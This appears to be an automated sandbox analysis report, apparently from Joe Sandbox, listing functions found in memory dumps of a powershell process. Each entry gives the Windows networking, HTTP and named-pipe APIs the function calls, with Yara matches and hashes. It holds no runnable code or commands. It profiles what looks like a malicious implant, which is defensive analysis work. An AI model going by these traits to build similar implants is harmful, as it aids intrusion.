Function 00007FFD34797FF2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ffbdb1c1ed5e66d904812257eecbaaa40417cb3d1a321e2144eac078cff1ea
Instruction ID: 3cf973894c16285234f463b81704750ee70cebca802819587abaabecbc852c35
Opcode Fuzzy Hash: e6ffbdb1c1ed5e66d904812257eecbaaa40417cb3d1a321e2144eac078cff1ea
Instruction Fuzzy Hash: 0841B687B1D782EAE692452C5CF60E63FD4DF5336070A05B3C645DA0A3EE0D6C1BA1A2

Function 00007FFD34795EFA Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 052196728280c5c0aca8576d94c43bcbe9db0c0682ab746849f352e73f36cb34
Instruction ID: a974beb5f35c4289ec890a85f578b8a5bb71209b510343fe2fc9898b50f78583
Opcode Fuzzy Hash: 052196728280c5c0aca8576d94c43bcbe9db0c0682ab746849f352e73f36cb34
Instruction Fuzzy Hash: 0A413597B0F7E25AE6634A2C58B60D63F95DF531B470E00F7C6C9CA063AD0D1847D6A2

Function 000001A6ED35CF97 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction ID: dec619449ef76579b9302a0768cc47a2c3129cb11f5d611388a4f8a91d87d145
Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction Fuzzy Hash: 4E613DB63156508BD714CB0DE4A066EB7E1F3CD784F88521AE38B87768CA3DD549CB44

Function 000001A6ED332980 Relevance: .1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
Instruction ID: 4db5ec2c7fb43a9a47ec214fa30245ead044fe658cfceb898e81aca4ae71f15d
Opcode Fuzzy Hash: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
Instruction Fuzzy Hash: 352183A3F3421007979CCA3D9C267BA65D6B394248359C83DF807E7B85D93CED898282

Function 000001A6ED3624C8 Relevance: .0, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec5aa9e0f310a05a7d4e348bf464b8e7399085d368e634c26742dea36e6bc2f
Instruction ID: 9319dba84b01b88afeccbffaafc6765fca89f44c77d196da734f1b9cbc40fe2c
Opcode Fuzzy Hash: bec5aa9e0f310a05a7d4e348bf464b8e7399085d368e634c26742dea36e6bc2f
Instruction Fuzzy Hash: 1D119B6F61F6C04AE2738A284D7619C2F95E7B3B14B8F50CAC790872C3E50908198317

Function 000001A6ED3624D0 Relevance: .0, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd184dd02204bbe27ad0a0aa26dad8171a75185b1ecfb51ba8d19fb54c587de9
Instruction ID: 1864c94af13a5e7aaa8eb1347f568c28c580435d42778789b43504d2276c3254
Opcode Fuzzy Hash: cd184dd02204bbe27ad0a0aa26dad8171a75185b1ecfb51ba8d19fb54c587de9
Instruction Fuzzy Hash: B411AC6F61FBC08AE273CA280D7619C6F91E7A3A14B8F50CAD790872C3E5490C198317

Function 000001A6ED3621C0 Relevance: .0, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe8975137368487851cbf218d3f8ccbec466bdd392a99d66203381082ffde24
Instruction ID: e283b0445c56ff0a2989312c22b3745f6a2e056c18ad25852a708ca5919aed6d
Opcode Fuzzy Hash: dfe8975137368487851cbf218d3f8ccbec466bdd392a99d66203381082ffde24
Instruction Fuzzy Hash: 68D0128FB5E6D283F273C6180D665CC2FC49763654B4E58B6CBA4466D2D509080A9217

Function 000001A6ED3621A8 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e030845fe4758d993a7963f5bece760aec5d07471d771b574ece67649364e1
Instruction ID: db633ca5e3e72b49b694c3255fa9438a3c06f8e7687ac0f5393d448177984876
Opcode Fuzzy Hash: a8e030845fe4758d993a7963f5bece760aec5d07471d771b574ece67649364e1
Instruction Fuzzy Hash:

Function 000001A6ED346BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 000001A6ED346C3D
select.WS2_32 ref: 000001A6ED346CAB
__WSAFDIsSet.WS2_32 ref: 000001A6ED346CC3
accept.WS2_32 ref: 000001A6ED346CE0
ioctlsocket.WS2_32 ref: 000001A6ED346CF8
__WSAFDIsSet.WS2_32 ref: 000001A6ED346D9B
accept.WS2_32 ref: 000001A6ED346DB1

Part of subcall function 000001A6ED345A20: ioctlsocket.WS2_32 ref: 000001A6ED345A42

__WSAFDIsSet.WS2_32 ref: 000001A6ED346E33
__WSAFDIsSet.WS2_32 ref: 000001A6ED346E4B
closesocket.WS2_32 ref: 000001A6ED346F0D

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction ID: 88e798b1580394a609a3594237eaa6a9ba562c5305f1a7608a69dc5336f8532d
Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction Fuzzy Hash: E8919E7A312A90DAE720CF29EA403DE33B1F79A798F180125DB4D47A95DF39C569C701

Function 000001A6ED33EC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED33ECD3
_snprintf.LIBCMT ref: 000001A6ED33ECFE
_snprintf.LIBCMT ref: 000001A6ED33ED1A
_snprintf.LIBCMT ref: 000001A6ED33EDCF
_snprintf.LIBCMT ref: 000001A6ED33EDE6
HttpOpenRequestA.WININET ref: 000001A6ED33EE32
HttpSendRequestA.WININET ref: 000001A6ED33EE65
InternetCloseHandle.WININET ref: 000001A6ED33EE7A
Sleep.KERNEL32 ref: 000001A6ED33EE85
InternetCloseHandle.WININET ref: 000001A6ED33EE98

Strings

%s%s, xrefs: 000001A6ED33EDDB
*/*, xrefs: 000001A6ED33EC2A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
String ID: %s%s$*/*
API String ID: 3787158362-856325523
Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction ID: 844909925073e6304a81685cee61aaa4b64cbb901467aaf6e1ecd5ca050a212f
Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction Fuzzy Hash: 1A81687A302A84D9EB10DB69E9443DD73A1F3A7788F480222EA5D537A5DF3CC50AC712

Function 000001A6ED33E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED33E725

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

Part of subcall function 000001A6ED347B38: _snprintf.LIBCMT ref: 000001A6ED347CA5

_snprintf.LIBCMT ref: 000001A6ED33E7BD
_snprintf.LIBCMT ref: 000001A6ED33E7D4
HttpOpenRequestA.WININET ref: 000001A6ED33E818
HttpSendRequestA.WININET ref: 000001A6ED33E84A
InternetQueryDataAvailable.WININET ref: 000001A6ED33E87A
InternetCloseHandle.WININET ref: 000001A6ED33E898

Part of subcall function 000001A6ED342D70: strchr.LIBCMT ref: 000001A6ED342DD6
Part of subcall function 000001A6ED342D70: _snprintf.LIBCMT ref: 000001A6ED342E0C

Part of subcall function 000001A6ED342C0C: strchr.LIBCMT ref: 000001A6ED342C69
Part of subcall function 000001A6ED342C0C: _snprintf.LIBCMT ref: 000001A6ED342CB3

InternetReadFile.WININET ref: 000001A6ED33E8D4
InternetCloseHandle.WININET ref: 000001A6ED33E8F5

Strings

%s%s, xrefs: 000001A6ED33E7C9
*/*, xrefs: 000001A6ED33E6CB

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3536628738-856325523
Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction ID: 8c68e09657d9ba158914ce53dd4bcff5f63cf8c38cfbcc7e9f84e4f2b7b5ce7b
Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction Fuzzy Hash: CE71D53A701680C6EB20DF69E5447DE63A1F7A7B98F480112EE5967B95DF3CC50AC701

Function 000001A6ED3453E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED3455E4
GetTickCount.KERNEL32 ref: 000001A6ED3455F0
CreateFileA.KERNEL32 ref: 000001A6ED34561E
GetLastError.KERNEL32 ref: 000001A6ED34562D
WaitNamedPipeA.KERNEL32 ref: 000001A6ED345642
Sleep.KERNEL32 ref: 000001A6ED34564F
GetTickCount.KERNEL32 ref: 000001A6ED345655
GetLastError.KERNEL32 ref: 000001A6ED34566B
GetLastError.KERNEL32 ref: 000001A6ED345683
SetNamedPipeHandleState.KERNEL32 ref: 000001A6ED3456AE
GetLastError.KERNEL32 ref: 000001A6ED3456B8
DisconnectNamedPipe.KERNEL32 ref: 000001A6ED345732

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
String ID:
API String ID: 34948862-0
Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction ID: 269bfc6c6679682c73fe67d28bf4dde80e98c7005b3651539caac75c55d30109
Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction Fuzzy Hash: EC417F3A706B00C6F710DB69E8447DD2761E3ABBA4F595221DE6A47B94CF3DC44A8702

Function 000001A6ED34FE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED34FE36

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34FE42
__crtIsPackagedApp.LIBCMT ref: 000001A6ED34FE53
AreFileApisANSI.KERNEL32 ref: 000001A6ED34FE62
MultiByteToWideChar.KERNEL32 ref: 000001A6ED34FE88
GetLastError.KERNEL32 ref: 000001A6ED34FE95
_dosmaperr.LIBCMT ref: 000001A6ED34FE9D

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction ID: 2679eed42731fa08e810216d192a3e30b99db2c43e0886aa64482a9f97d481fd
Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction Fuzzy Hash: 07319E3D702B40C6FB24DB2A98043AE67E1ABA7B96F1C06249A55477D6DF3DC4498302

Function 000001A6ED34FF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 000001A6ED34FF7D
free.LIBCMT ref: 000001A6ED34FF9A

Part of subcall function 000001A6ED34F244: HeapFree.KERNEL32 ref: 000001A6ED34F25A
Part of subcall function 000001A6ED34F244: _errno.LIBCMT ref: 000001A6ED34F264
Part of subcall function 000001A6ED34F244: GetLastError.KERNEL32 ref: 000001A6ED34F26C

free.LIBCMT ref: 000001A6ED34FFAF
free.LIBCMT ref: 000001A6ED34FFD0
free.LIBCMT ref: 000001A6ED34FFE5
free.LIBCMT ref: 000001A6ED34FFF9
free.LIBCMT ref: 000001A6ED350005
free.LIBCMT ref: 000001A6ED350030
EncodePointer.KERNEL32 ref: 000001A6ED350038
free.LIBCMT ref: 000001A6ED350051
free.LIBCMT ref: 000001A6ED35006A
free.LIBCMT ref: 000001A6ED35009B

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction ID: 9c3ea1efd451926f39b9285c558557f10a16b4504cb41d3bef4bd4ad02936ecb
Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction Fuzzy Hash: C431FB3E313E40E1FE54EB5DE8503EA23A0AB7BB96F4C16259919562E1CF6D844D8313

Function 000001A6ED347308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED347336
select.WS2_32 ref: 000001A6ED34738D
__WSAFDIsSet.WS2_32 ref: 000001A6ED34739C
__WSAFDIsSet.WS2_32 ref: 000001A6ED3473B4
GetTickCount.KERNEL32 ref: 000001A6ED3473BD
gethostbyname.WS2_32 ref: 000001A6ED3473D0
htons.WS2_32 ref: 000001A6ED3473E8
inet_addr.WS2_32 ref: 000001A6ED3473FA
sendto.WS2_32 ref: 000001A6ED347423

Strings

d, xrefs: 000001A6ED347347

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction ID: 73cf31aa9e50f1257fc53aaf5d350af741f7bce208f3b8ba2bb7fe48bf6624fa
Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction Fuzzy Hash: B7318E3A325B80C6D720CF55E8443DE73A0F78AB88F091026EA8D43B64DF79C559CB41

Function 000001A6ED301B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

write_multi_char.LIBCMT ref: 000001A6ED301FEB
write_string.LIBCMT ref: 000001A6ED302008
write_multi_char.LIBCMT ref: 000001A6ED302025
write_string.LIBCMT ref: 000001A6ED302084
write_multi_char.LIBCMT ref: 000001A6ED3020DD
free.LIBCMT ref: 000001A6ED3020F1

Strings

, xrefs: 000001A6ED301FBF

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: write_multi_char$write_string$free
String ID:
API String ID: 2630409672-3916222277
Opcode ID: a98f2533e89297d6825b7c4f6c9a926d6158e6b7171972381b0d6ae3b2a7e262
Instruction ID: 0db256afc8614cbeb0ed05c725cb587498eec9860d407d347b61c22bc01adf7f
Opcode Fuzzy Hash: a98f2533e89297d6825b7c4f6c9a926d6158e6b7171972381b0d6ae3b2a7e262
Instruction Fuzzy Hash: A8A1C03A709744C6FB61CB69A5003EE6BA0B7A77C4F1C4106DF4957AD9EB38C949CB02

Function 000001A6ED3471FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED34721C
select.WS2_32 ref: 000001A6ED347282
__WSAFDIsSet.WS2_32 ref: 000001A6ED347291
__WSAFDIsSet.WS2_32 ref: 000001A6ED3472A6
send.WS2_32 ref: 000001A6ED3472BC
WSAGetLastError.WS2_32 ref: 000001A6ED3472C7
Sleep.KERNEL32 ref: 000001A6ED3472D9
GetTickCount.KERNEL32 ref: 000001A6ED3472DF

Strings

d, xrefs: 000001A6ED34722A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction ID: 2ac0ad124fd3ac7008b086592cc3abf753b0681c86ec8b95e44f79538bedd794
Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction Fuzzy Hash: 63219C7A325A80C6E770CF25E8883CE73A1F79A7C4F480125EB9D47A94DF39C4598B85

Function 000001A6ED33FB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED33FB29
GetLastError.KERNEL32 ref: 000001A6ED33FB83
GetTickCount.KERNEL32 ref: 000001A6ED33FB8E
Sleep.KERNEL32 ref: 000001A6ED33FB9E
GetLastError.KERNEL32 ref: 000001A6ED33FBAB
WriteFile.KERNEL32 ref: 000001A6ED33FBDE
WriteFile.KERNEL32 ref: 000001A6ED33FC0D
FlushFileBuffers.KERNEL32 ref: 000001A6ED33FC25
DisconnectNamedPipe.KERNEL32 ref: 000001A6ED33FC2F
Sleep.KERNEL32 ref: 000001A6ED33FC43

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
String ID:
API String ID: 3101085627-0
